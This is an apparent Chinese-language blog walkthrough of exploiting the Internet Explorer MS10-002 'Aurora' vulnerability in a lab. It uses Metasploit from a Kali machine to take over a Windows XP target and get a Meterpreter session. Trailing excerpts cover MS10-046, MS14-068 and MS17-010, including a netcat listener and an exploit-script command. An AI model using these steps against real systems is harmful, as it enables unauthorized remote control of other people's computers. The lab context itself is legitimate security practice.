MS10 002漏洞利用

2021-10-11 04:30:02 字數 1262 閱讀 5532

漏洞披露

漏洞原理

針對internet explorer「極光」記憶體損壞的攻擊

也就是ie瀏覽器漏洞

影響範圍:見上方鏈結

(之前測試過win7,發現win7各個版本的ie都失敗了,xp是成功了,建議以xp做靶機)

漏洞利用

攻擊方:192.168.216.139(kali linux)

靶機:192.168.216.141(windows xp)

1.使用msf框架

設定目標靶機ip位址和埠(埠隨便填,只要kali上這個埠未被使用即可)

show opitons

set rhost 192.168.216.141

set roprt 1136

run

如果執行後未顯示session(如下圖所示),就代表失敗

如果成功了就像下圖

執行後把目標**複製到xp的ie瀏覽器上訪問即可看到kali有反饋

接著使用sessions -i即可看到目標主機

使用sessions -1使用即可進入到metetpreter

使用ipconfig即可看到目標主機ip

這樣xp系統就被控制了

meterpreter板塊

除了ipconfig之外,meterpreter還可以使用很多功能

例如開啟vnc(監控軟體)

首先需要開啟靶機遠端桌面

有關meterpreter暫時先說到這裡

還有許多例如埠**,開啟問價等都可以試試

MS10 046漏洞利用

漏洞披露 漏洞原理 如果顯示特製的快捷方式圖示,則該漏洞可能允許遠端執行 成功利用此漏洞的攻擊者可以獲得與本地使用者相同的使用者許可權。那些帳戶被配置為擁有較少系統使用者許可權的使用者比具有管理使用者許可權的使用者受到的影響要小。總的來說就是ie瀏覽器的圖示漏洞 漏洞利用 攻擊方 192.168.2...

MS14 068域許可權提公升漏洞利用

在寫該篇文章之前,本人已經寫過了關於域滲透之 票據和 票據的利用方式,今天的內容也是關於域滲透提權的利用,並且ms14 068這個exp也是由kerberos協議而來。在實際的滲透過程中,獲得了乙個域成員 非管理員 的賬號後,如果剛好域控機器未打補丁 kb3011780 這是官方給出的修復補丁,那麼...

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....